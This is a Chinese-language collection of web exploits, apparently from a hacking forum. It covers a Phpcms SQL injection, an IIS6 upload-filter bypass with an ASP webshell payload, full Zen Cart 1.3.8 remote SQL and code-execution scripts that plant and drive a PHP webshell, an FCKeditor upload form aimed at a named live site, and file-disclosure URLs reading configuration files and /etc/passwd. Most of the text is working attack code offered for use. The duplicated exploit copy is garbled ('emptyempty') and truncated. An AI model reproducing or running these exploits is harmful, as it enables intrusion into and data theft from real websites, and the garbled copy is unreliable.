Phpcms 2008 space.api.php SQL注入漏洞
EXP:
api/space.api.php?userid=2&order=if((select%20count(*)%20from%20phpcms_member)>1,contentid,1)%20desc%23
asp操作本身小备忘
Server.MapPath()获取本机绝对路径
. Server.MapPath("/") 应用程序根目录所在的位置 如
C:\Inetpub\wwwroot\
2.Server.MapPath("./") 表示所在页面的当前目录
注:等价于Server.MapPath("") 返回 Server.MapPath("")所在页面的物理文件路径
3.Server.MapPath("../")表示上一级目录
4.Server.MapPath("~/")表示当前应用级程序的目录,如果是根目录,就是根目录,如果是虚拟目录,就是虚拟目录所在的位置如:
C:\Inetpub\wwwroot\Example\
注:等效于Server.MapPath("~"),即相对路径。
upfile 又一奇迹般的突破
不知道各位。在上传的时候。 有没需要过。 一个上传。 不修改名字。。然后上传目录已经被程序所定义了。
然而。上传目录取消了脚本执行的权限。 我想这里估计大家都要放弃了。
如何突破呢?其实是可以的. 关键是 [不修改名字]
先来看看一个上传的数据包:
POST /fa-bu/upload/upfile1.asp HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://xxxxx/fa-bu/upload/upload.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7da290150c5e
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: xxx.xxxx.xxnet
Content-Length: 448
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSCTCSCT=DJBKGKLBBIGNKJMBGOENNPAN
-----------------------------7da290150c5e
Content-Disposition: form-data; name="act"
upload
-----------------------------7da290150c5e
Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\111.asp;.gif"
Content-Type: text/plain
<%execute(request("cmd"))%>
-----------------------------7da290150c5e
Content-Disposition: form-data; name="Submit"
up
-----------------------------7da290150c5e--
关键是 :
Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\111.asp;.gif"
我首先呢。 filename他是如何判断 那个开始就是文件名呢? 他是判断filename里的最右边的一个"\"以后的就是文件名字了。
大家因该知道。 在windows下 "\" 和 "/" 是不分家的。
假设上传之后的目录为upload/
然后一个可以执行可以写的目录为 okokok/
那么我们只要构造
Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\./../okokok/111.asp;.gif"
那么我们上传的文件就成功的传进去了 okokok/111.asp;.gif了。
突破之!
PS: win+iis6.0测试成功。
[转载请注明,谢谢合作、否则木JJ。]
by www.sb-sb.cn
Zen Cart 1.3.8 Remote SQL Execution
#!/usr/bin/python
#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#
#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
# DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
# DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';
import urllib, urllib2, re, sys
a,b = sys.argv,0
def option(name, need = 0):
global a, b
for param in sys.argv:
if(param == '-'+name): return str(sys.argv[b+1])
b = b + 1
if(need):
print '\n#error', "-"+name, 'parameter required'
exit(1)
if (len(sys.argv) < 2):
print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit ____________=
========================================================================
| BlackH <Bl4ck.H@gmail.com> |
========================================================================
| |
| $system> python """+sys.argv[0]+""" -url <url> |
| Param: <url> ex: http://victim.com/site (no slash) |
| |
| Note: blind "injection" |
========================================================================
"""
exit(1)
url, trick = option('url', 1), "/password_forgotten.php"
while True:
cmd = raw_input('sql@jah$ ')
if (cmd == "exit"): exit(1)
req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
print '>> success (', cmd, ")"
else:
print '>> failed, be sure to end with ; (', cmd, ")"
Zen Cart 1.3.8 Remote Code Execution
<?php
#
# ------- Zen Cart 1.3.8 Remote Code Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#
error_reporting(E_ALL ^ E_NOTICE);
if($argc < 2)
{
echo "
=___________ Zen Cart 1.3.8 Remote Code Execution Exploit ____________=
========================================================================
| BlackH <Bl4ck.H@gmail.com> |
========================================================================
| |
| \$system> php $argv[0] <url> |
| Notes: <url> ex: http://victim.com/site (no slash) |
| |
========================================================================
";exit(1);
}
$url = $argv[1];
$trick = "/password_forgotten.php";
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
$real_kthxbye = remote_exec($url);
# Remote Code Execution Exploit
function remote_exec($url) {
global $xpl, $url, $trick;
echo "\n[-] Remote Code Execution";
if(!$xpl->get($url.'/admin/')) die("\n[!] error - the /admin/ directory is protected or don't exist.\n");
$n = substr(md5(rand(0, 1337)), 0, 5).".php"; # random php file
$code = '<?php eval($_POST[a])?> <?php echo realpath('.'); ?>';
$form = array(frmdt_url => $url."/admin/record_company.php".$trick."?action=insert",
"record_company_name" => "0",
"record_company_images" => array(frmdt_type => "tgreal/suce", # it works ! o_O
frmdt_filename => $n,
frmdt_content => $code));
if($xpl->formdata($form)) echo "\n[!] Done - Start Shell: ".$n;
else die("\n[!] error - can't upload the shell\n");
print "\nrce@jah\$>";
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))){
$xpl->addheader('SHELL',$cmd);
$xpl->get($url.'/images/'.$n);
print $xpl->getcontent()."\nrce@jah$> ";
# don't forget to "rm *.php" and exit
# you can use "Zen Cart 1.3.8 Remote SQL Execution Exploit"
# to clean the database (record_company & record_company_info)
}
}
/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* TITLE: PhpSploit Class
* REQUIREMENTS: PHP 4 / PHP 5
* VERSION: 2.0
* LICENSE: GNU General Public License
* ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt
* FILENAME: phpsploitclass.php
*
* CONTACT: gmdarkfig@gmail.com (french / english)
* GREETZ: Sparah, Ddx39
*
* DESCRIPTION:
* The phpsploit is a class implementing a web user agent.
* You can add cookies, headers, use a proxy server with (or without) a
* basic authentification. It supports the GET and the POST method. It can
* also be used like a browser with the cookiejar() function (which allow
* a server to add several cookies for the next requests) and the
* allowredirection() function (which allow the script to follow all
* redirections sent by the server). It can return the content (or the
* headers) of the request. Others useful functions can be used for debugging.
* A manual is actually in development but to know how to use it, you can
* read the comments.
*
* CHANGELOG:
*
* [2007-06-10] (2.0)
* * Code: Code optimization
* * New: Compatible with PHP 4 by default
*
* [2007-01-24] (1.2)
* * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
* * New: multipart/form-data enctype is now supported
*
* [2006-12-31] (1.1)
* * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
* * New: You can now call the getheader() / getcontent() function without parameters
*
* [2006-12-30] (1.0)
* * First version
*
*/
class phpsploit
{
var $proxyhost;
var $proxyport;
var $host;
var $path;
var $port;
var $method;
var $url;
var $packet;
var $proxyuser;
var $proxypass;
var $header;
var $cookie;
var $data;
var $boundary;
var $allowredirection;
var $last_redirection;
var $cookiejar;
var $recv;
var $cookie_str;
var $header_str;
var $server_content;
var $server_header;
/**
* This function is called by the
* get()/post()/formdata() functions.
* You don't have to call it, this is
* the main function.
*
* @access private
* @return string $this->recv ServerResponse
*
*/
function sock()
{
if(!empty($this->proxyhost) && !empty($this->proxyport))
$socket = @fsockopen($this->proxyhost,$this->proxyport);
else
$socket = @fsockopen($this->host,$this->port);
if(!$socket)
die("Error: Host seems down");
if($this->method=='get')
$this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
elseif($this->method=='post' or $this->method=='formdata')
$this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
else
die("Error: Invalid method");
if(!empty($this->proxyuser))
$this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
if(!empty($this->header))
$this->packet .= $this->showheader();
if(!empty($this->cookie))
$this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
$this->packet .= 'Host: '.$this->host."\r\n";
$this->packet .= "Connection: Close\r\n";
if($this->method=='post')
{
$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data."\r\n";
}
elseif($this->method=='formdata')
{
$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data;
}
$this->packet .= "\r\n";
$this->recv = '';
fputs($socket,$this->packet);
while(!feof($socket))
$this->recv .= fgets($socket);
fclose($socket);
if($this->cookiejar)
$this->getcookie();
if($this->allowredirection)
return $this->getredirection();
else
return $this->recv;
}
/**
* This function allows you to add several
* cookies in the request.
*
* @access public
* @param string cookn CookieName
* @param string cookv CookieValue
* @example $this->addcookie('name','value')
*
*/
function addcookie($cookn,$cookv)
{
if(!isset($this->cookie))
$this->cookie = array();
$this->cookie[$cookn] = $cookv;
}
/**
* This function allows you to add several
* headers in the request.
*
* @access public
* @param string headern HeaderName
* @param string headervalue Headervalue
* @example $this->addheader('Client-IP', '128.5.2.3')
*
*/
function addheader($headern,$headervalue)
{
if(!isset($this->header))
$this->header = array();
$this->header[$headern] = $headervalue;
}
/**
* This function allows you to use an
* http proxy server. Several methods
* are supported.
*
* @access public
* @param string proxy ProxyHost
* @param integer proxyp ProxyPort
* @example $this->proxy('localhost',8118)
* @example $this->proxy('localhost:8118')
*
*/
function proxy($proxy,$proxyp='')
{
if(empty($proxyp))
{
$proxarr = explode(':',$proxy);
$this->proxyhost = $proxarr[0];
$this->proxyport = (int)$proxarr[1];
}
else
{
$this->proxyhost = $proxy;
$this->proxyport = (int)$proxyp;
}
if($this->proxyport > 65535)
die("Error: Invalid port number");
}
/**
* This function allows you to use an
* http proxy server which requires a
* basic authentification. Several
* methods are supported:
*
* @access public
* @param string proxyauth ProxyUser
* @param string proxypass ProxyPass
* @example $this->proxyauth('user','pwd')
* @example $this->proxyauth('user:pwd');
*
*/
function proxyauth($proxyauth,$proxypass='')
{
if(empty($proxypass))
{
$posvirg = strpos($proxyauth,':');
$this->proxyuser = substr($proxyauth,0,$posvirg);
$this->proxypass = substr($proxyauth,$posvirg+1);
}
else
{
$this->proxyuser = $proxyauth;
$this->proxypass = $proxypass;
}
}
/**
* This function allows you to set
* the 'User-Agent' header.
*
* @access public
* @param string useragent Agent
* @example $this->agent('Firefox')
*
*/
function agent($useragent)
{
$this->addheader('User-Agent',$useragent);
}
/**
* This function returns the headers
* which will be in the next request.
*
* @access public
* @return string $this->header_str Headers
* @example $this->showheader()
*
*/
function showheader()
{
$this->header_str = '';
if(!isset($this->header))
return;
foreach($this->header as $name => $value)
$this->header_str .= $name.': '.$value."\r\n";
return $this->header_str;
}
/**
* This function returns the cookies
* which will be in the next request.
*
* @access public
* @return string $this->cookie_str Cookies
* @example $this->showcookie()
*
*/
function showcookie()
{
$this->cookie_str = '';
if(!isset($this->cookie))
return;
foreach($this->cookie as $name => $value)
$this->cookie_str .= $name.'='.$value.'; ';
return $this->cookie_str;
}
/**
* This function returns the last
* formed http request.
*
* @access public
* @return string $this->packet HttpPacket
* @example $this->showlastrequest()
*
*/
function showlastrequest()
{
if(!isset($this->packet))
return;
else
return $this->packet;
}
/**
* This function sends the formed
* http packet with the GET method.
*
* @access public
* @param string url Url
* @return string $this->sock()
* @example $this->get('localhost/index.php?var=x')
* @example $this->get('http://localhost:88/tst.php')
*
*/
function get($url)
{
$this->target($url);
$this->method = 'get';
return $this->sock();
}
/**
* This function sends the formed
* http packet with the POST method.
*
* @access public
* @param string url Url
* @param string data PostData
* @return string $this->sock()
* @example $this->post('http://localhost/','helo=x')
*
*/
function post($url,$data)
{
$this->target($url);
$this->method = 'post';
$this->data = $data;
return $this->sock();
}
/**
* This function sends the formed http
* packet with the POST method using
* the multipart/form-data enctype.
*
* @access public
* @param array array FormDataArray
* @return string $this->sock()
* @example $formdata = array(
* frmdt_url => 'http://localhost/upload.php',
* frmdt_boundary => '123456', # Optional
* 'var' => 'example',
* 'file' => array(
* frmdt_type => 'image/gif', # Optional
* frmdt_transfert => 'binary' # Optional
* frmdt_filename => 'hello.php,
* frmdt_content => '<?php echo 1; ?>'));
* $this->formdata($formdata);
*
*/
function formdata($array)
{
$this->target($array[frmdt_url]);
$this->method = 'formdata';
$this->data = '';
if(!isset($array[frmdt_boundary]))
$this->boundary = 'phpsploit';
else
$this->boundary = $array[frmdt_boundary];
foreach($array as $key => $value)
{
if(!preg_match('#^frmdt_(boundary|url)#',$key))
{
$this->data .= str_repeat('-',29).$this->boundary."\r\n";
$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
if(!is_array($value))
{
$this->data .= "\r\n\r\n".$value."\r\n";
}
else
{
$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
if(isset($array[$key][frmdt_type]))
$this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
if(isset($array[$key][frmdt_transfert]))
$this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
}
}
}
$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
return $this->sock();
}
/**
* This function returns the content
* of the server response, without
* the headers.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_content
* @example $this->getcontent()
* @example $this->getcontent($this->get('http://localhost/'))
*
*/
function getcontent($code='')
{
if(empty($code))
$code = $this->recv;
$code = explode("\r\n\r\n",$code);
$this->server_content = '';
for($i=1;$i<count($code);$i++)
$this->server_content .= $code[$i];
return $this->server_content;
}
/**
* This function returns the headers
* of the server response, without
* the content.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_header
* @example $this->getcontent()
* @example $this->getcontent($this->post('http://localhost/','1=2'))
*
*/
function getheader($code='')
{
if(empty($code))
$code = $this->recv;
$code = explode("\r\n\r\n",$code);
$this->server_header = $code[0];
return $this->server_header;
}
/**
* This function is called by the
* cookiejar() function. It adds the
* value of the "Set-Cookie" header
* in the "Cookie" header for the
* next request. You don't have to
* call it.
*
* @access private
* @param string code ServerResponse
*
*/
function getcookie()
{
foreach(explode("\r\n",$this->getheader()) as $header)
{
if(preg_match('/set-cookie/i',$header))
{
$fequal = strpos($header,'=');
$fvirgu = strpos($header,';');
// 12=strlen('set-cookie: ')
$cname = substr($header,12,$fequal-12);
$cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
$this->cookie[trim($cname)] = trim($cvalu);
}
}
}
/**
* This function is called by the
* get()/post() functions. You
* don't have to call it.
*
* @access private
* @param string urltarg Url
* @example $this->target('http://localhost/')
*
*/
function target($urltarg)
{
if(!ereg('^http://',$urltarg))
$urltarg = 'http://'.$urltarg;
$urlarr = parse_url($urltarg);
$this->url = 'http://'.$urlarr['host'].$urlarr['path'];
if(isset($urlarr['query']))
$this->url .= '?'.$urlarr['query'];
$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
$this->host = $urlarr['host'];
if($this->port != '80')
$this->host .= ':'.$this->port;
if(!isset($urlarr['path']) or empty($urlarr['path']))
die("Error: No path precised");
$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
if($this->port > 65535)
die("Error: Invalid port number");
}
/**
* If you call this function,
* the script will extract all
* 'Set-Cookie' headers values
* and it will automatically add
* them into the 'Cookie' header
* for all next requests.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->cookiejar(0)
* @example $this->cookiejar(1)
*
*/
function cookiejar($code)
{
if($code=='0')
$this->cookiejar=FALSE;
elseif($code=='1')
$this->cookiejar=TRUE;
}
/**
* If you call this function,
* the script will follow all
* redirections sent by the server.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->allowredirection(0)
* @example $this->allowredirection(1)
*
*/
function allowredirection($code)
{
if($code=='0')
$this->allowredirection=FALSE;
elseif($code=='1')
$this->allowredirection=TRUE;
}
/**
* This function is called if
* allowredirection() is enabled.
* You don't have to call it.
*
* @access private
* @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
* @return string $this->get($this->last_redirection)
* @return string $this->recv;
*
*/
function getredirection()
{
if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
{
$this->last_redirection = trim($codearr[2]);
if(!ereg('://',$this->last_redirection))
return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
else
return $this->get($this->last_redirection);
}
else
return $this->recv;
}
/**
* This function allows you
* to reset some parameters.
*
* @access public
* @param string func Param
* @example $this->reset('header')
* @example $this->reset('cookie')
* @example $this->reset()
*
*/
function reset($func='')
{
switch($func)
{
case 'header':
$this->header = array('');
break;
case 'cookie':
$this->cookie = array('');
break;
default:
$this->cookiejar = '';
$this->header = array('');
$this->cookie = array('');
$this->allowredirection = '';
break;
}
}
}
?>
zen cart 1.38a以下 通杀ODAY
不是
Remote Code Execution Exploit
Remote SQL Execution Exploit
而是FCK的漏洞。呵呵,我搜索了一下没人发表我发出来。
好心人给2个金币,十分感谢。
<form id="frmUpload" enctype="multipart/form-data" action="http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
大家试下威力。
直接上传PHP WEBSHELL 到IMAGES
漏洞2
Zen Cart 本地文件泄露
得到网页所在路径
/extras/ipn_test_return.php
得到网站配置信息
/extras/curltest.php?url=file:///网站地址/includes/configure.php
读取linux服务器passwd
/extras/curltest.php?url=file:///etc/passwd
漏洞3
Zen Cart v1.3.9f (typefilter) 本地文件包含漏洞
EXP:http://127.0.0.1/index.php?typef ... %2F..%2Fboot.ini%00
直接给出EXP 很早的 依然很强大。。。。。。
漏洞4 <?php
#
# ------- Zen Cart 1.3.8 Remote Code Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#
error_reporting(E_ALL ^ E_NOTICE);
if($argc < 2)
{
echo "
=___________ Zen Cart 1.3.8 Remote Code Execution Exploit ____________=
========================================================================
| BlackH <Bl4ck.H@gmail.com> |
========================================================================
| |
| \$system> php $argv[0] <url> |
| Notes: <url> ex: http://victim.com/site (no slash) |
| |
========================================================================
";exit(1);
}
$url = $argv[1];
$trick = "/password_forgotten.php";
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
$real_kthxbye = remote_exec($url);
# Remote Code Execution Exploit
function remote_exec($url) {
global $xpl, $url, $trick;
echo "\n[-] Remote Code Execution";
if(!$xpl->get($url.'/admin/')) die("\n[!] error - the /admin/ directory is protected or don't exist.\n");
$n = substr(md5(rand(0, 1337)), 0, 5).".php"; # random php file
$code = '<?php system($_SERVER["HTTP_SHELL"]); ?>';
$form = array(frmdt_url => $url."/admin/record_company.php".$trick."?action=insert",
"record_company_name" => "0",
"record_company_image" => array(frmdt_type => "tgreal/suce", # it works ! o_O
frmdt_filename => $n,
frmdt_content => $code));
if($xpl->formdata($form)) echo "\n[!] Done - Start Shell: ".$n;
else die("\n[!] error - can't upload the shell\n");
print "\nrce@jah\$> ";
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))){
$xpl->addheader('SHELL',$cmd);
$xpl->get($url.'/images/'.$n);
print $xpl->getcontent()."\nrce@jah$> ";
# don't forget to "rm *.php" and exit
# you can use "Zen Cart 1.3.8 Remote SQL Execution Exploit"
# to clean the database (record_company & record_company_info)
}
}
class phpsploit
{
var $proxyhost;
var $proxyport;
var $host;
var $path;
var $port;
var $method;
var $url;
var $packet;
var $proxyuser;
var $proxypass;
var $header;
var $cookie;
var $data;
var $boundary;
var $allowredirection;
var $last_redirection;
var $cookiejar;
var $recv;
var $cookie_str;
var $header_str;
var $server_content;
var $server_header;
/**
* This function is called by the
* get()/post()/formdata() functions.
* You don't have to call it, this is
* the main function.
*
* @access private
* @return string $this->recv ServerResponse
*
*/
function sock()
{
if(!emptyempty($this->proxyhost) && !emptyempty($this->proxyport))
$socket = @fsockopen($this->proxyhost,$this->proxyport);
else
$socket = @fsockopen($this->host,$this->port);
if(!$socket)
die("Error: Host seems down");
if($this->method=='get')
$this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
elseif($this->method=='post' or $this->method=='formdata')
$this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
else
die("Error: Invalid method");
if(!emptyempty($this->proxyuser))
$this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
if(!emptyempty($this->header))
$this->packet .= $this->showheader();
if(!emptyempty($this->cookie))
$this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
$this->packet .= 'Host: '.$this->host."\r\n";
$this->packet .= "Connection: Close\r\n";
if($this->method=='post')
{
$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data."\r\n";
}
elseif($this->method=='formdata')
{
$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data;
}
$this->packet .= "\r\n";
$this->recv = '';
fputs($socket,$this->packet);
while(!feof($socket))
$this->recv .= fgets($socket);
fclose($socket);
if($this->cookiejar)
$this->getcookie();
if($this->allowredirection)
return $this->getredirection();
else
return $this->recv;
}
/**
* This function allows you to add several
* cookies in the request.
*
* @access public
* @param string cookn CookieName
* @param string cookv CookieValue
* @example $this->addcookie('name','value')
*
*/
function addcookie($cookn,$cookv)
{
if(!isset($this->cookie))
$this->cookie = array();
$this->cookie[$cookn] = $cookv;
}
/**
* This function allows you to add several
* headers in the request.
*
* @access public
* @param string headern HeaderName
* @param string headervalue Headervalue
* @example $this->addheader('Client-IP', '128.5.2.3')
*
*/
function addheader($headern,$headervalue)
{
if(!isset($this->header))
$this->header = array();
$this->header[$headern] = $headervalue;
}
/**
* This function allows you to use an
* http proxy server. Several methods
* are supported.
*
* @access public
* @param string proxy ProxyHost
* @param integer proxyp ProxyPort
* @example $this->proxy('localhost',8118)
* @example $this->proxy('localhost:8118')
*
*/
function proxy($proxy,$proxyp='')
{
if(emptyempty($proxyp))
{
$proxarr = explode(':',$proxy);
$this->proxyhost = $proxarr[0];
$this->proxyport = (int)$proxarr[1];
}
else
{
$this->proxyhost = $proxy;
$this->proxyport = (int)$proxyp;
}
if($this->proxyport > 65535)
die("Error: Invalid port number");
}
/**
* This function allows you to use an
* http proxy server which requires a
* basic authentification. Several
* methods are supported:
*
* @access public
* @param string proxyauth ProxyUser
* @param string proxypass ProxyPass
* @example $this->proxyauth('user','pwd')
* @example $this->proxyauth('user:pwd');
*
*/
function proxyauth($proxyauth,$proxypass='')
{
if(emptyempty($proxypass))
{
$posvirg = strpos($proxyauth,':');
$this->proxyuser = substr($proxyauth,0,$posvirg);
$this->proxypass = substr($proxyauth,$posvirg+1);
}
else
{
$this->proxyuser = $proxyauth;
$this->proxypass = $proxypass;
}
}
/**
* This function allows you to set
* the 'User-Agent' header.
*
* @access public
* @param string useragent Agent
* @example $this->agent('Firefox')
*
*/
function agent($useragent)
{
$this->addheader('User-Agent',$useragent);
}
/**
* This function returns the headers
* which will be in the next request.
*
* @access public
* @return string $this->header_str Headers
* @example $this->showheader()
*
*/
function showheader()
{
$this->header_str = '';
if(!isset($this->header))
return;
foreach($this->header as $name => $value)
$this->header_str .= $name.': '.$value."\r\n";
return $this->header_str;
}
/**
* This function returns the cookies
* which will be in the next request.
*
* @access public
* @return string $this->cookie_str Cookies
* @example $this->showcookie()
*
*/
function showcookie()
{
$this->cookie_str = '';
if(!isset($this->cookie))
return;
foreach($this->cookie as $name => $value)
$this->cookie_str .= $name.'='.$value.'; ';
return $this->cookie_str;
}
/**
* This function returns the last
* formed http request.
*
* @access public
* @return string $this->packet HttpPacket
* @example $this->showlastrequest()
*
*/
function showlastrequest()
{
if(!isset($this->packet))
return;
else
return $this->packet;
}
/**
* This function sends the formed
* http packet with the GET method.
*
* @access public
* @param string url Url
* @return string $this->sock()
* @example $this->get('localhost/index.php?var=x')
* @example $this->get('http://localhost:88/tst.php')
*
*/
function get($url)
{
$this->target($url);
$this->method = 'get';
return $this->sock();
}
/**
* This function sends the formed
* http packet with the POST method.
*
* @access public
* @param string url Url
* @param string data PostData
* @return string $this->sock()
* @example $this->post('http://localhost/','helo=x')
*
*/
function post($url,$data)
{
$this->target($url);
$this->method = 'post';
$this->data = $data;
return $this->sock();
}
/**
* This function sends the formed http
* packet with the POST method using
* the multipart/form-data enctype.
*
* @access public
* @param array array FormDataArray
* @return string $this->sock()
* @example $formdata = array(
* frmdt_url => 'http://localhost/upload.php',
* frmdt_boundary => '123456', # Optional
* 'var' => 'example',
* 'file' => array(
* frmdt_type => 'image/gif', # Optional
* frmdt_transfert => 'binary' # Optional
* frmdt_filename => 'hello.php,
* frmdt_content => '<?php echo 1; ?>'));
* $this->formdata($formdata);
*
*/
function formdata($array)
{
$this->target($array[frmdt_url]);
$this->method = 'formdata';
$this->data = '';
if(!isset($array[frmdt_boundary]))
$this->boundary = 'phpsploit';
else
$this->boundary = $array[frmdt_boundary];
foreach($array as $key => $value)
{
if(!preg_match('#^frmdt_(boundary|url)#',$key))
{
$this->data .= str_repeat('-',29).$this->boundary."\r\n";
$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
if(!is_array($value))
{
$this->data .= "\r\n\r\n".$value."\r\n";
}
else
{
$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
if(isset($array[$key][frmdt_type]))
$this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
if(isset($array[$key][frmdt_transfert]))
$this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
}
}
}
$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
return $this->sock();
}
/**
* This function returns the content
* of the server response, without
* the headers.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_content
* @example $this->getcontent()
* @example $this->getcontent($this->get('http://localhost/'))
*
*/
function getcontent($code='')
{
if(emptyempty($code))
$code = $this->recv;
$code = explode("\r\n\r\n",$code);
$this->server_content = '';
for($i=1;$i<count($code);$i++)
$this->server_content .= $code[$i];
return $this->server_content;
}
/**
* This function returns the headers
* of the server response, without
* the content.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_header
* @example $this->getcontent()
* @example $this->getcontent($this->post('http://localhost/','1=2'))
*
*/
function getheader($code='')
{
if(emptyempty($code))
$code = $this->recv;
$code = explode("\r\n\r\n",$code);
$this->server_header = $code[0];
return $this->server_header;
}
/**
* This function is called by the
* cookiejar() function. It adds the
* value of the "Set-Cookie" header
* in the "Cookie" header for the
* next request. You don't have to
* call it.
*
* @access private
* @param string code ServerResponse
*
*/
function getcookie()
{
foreach(explode("\r\n",$this->getheader()) as $header)
{
if(preg_match('/set-cookie/i',$header))
{
$fequal = strpos($header,'=');
$fvirgu = strpos($header,';');
// 12=strlen('set-cookie: ')
$cname = substr($header,12,$fequal-12);
$cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
$this->cookie[trim($cname)] = trim($cvalu);
}
}
}
/**
* This function is called by the
* get()/post() functions. You
* don't have to call it.
*
* @access private
* @param string urltarg Url
* @example $this->target('http://localhost/')
*
*/
function target($urltarg)
{
if(!ereg('^http://',$urltarg))
$urltarg = 'http://'.$urltarg;
$urlarr = parse_url($urltarg);
$this->url = 'http://'.$urlarr['host'].$urlarr['path'];
if(isset($urlarr['query']))
$this->url .= '?'.$urlarr['query'];
$this->port = !emptyempty($urlarr['port']) ? $urlarr['port'] : 80;
$this->host = $urlarr['host'];
if($this->port != '80')
$this->host .= ':'.$this->port;
if(!isset($urlarr['path']) or emptyempty($urlarr['path']))
die("Error: No path precised");
$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
if($this->port > 65535)
die("Error: Invalid port number");
}
/**
* If you call this function,
* the script will extract all
* 'Set-Cookie' headers values
* and it will automatically add
* them into the 'Cookie' header
* for all next requests.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->cookiejar(0)
* @example $this->cookiejar(1)
*
*/
function cookiejar($code)
{
if($code=='0')
$this->cookiejar=FALSE;
elseif($code=='1')
$this->cookiejar=TRUE;
}
/**
* If you call this function,
* the script will follow all
* redirections sent by the server.
*
* @access public
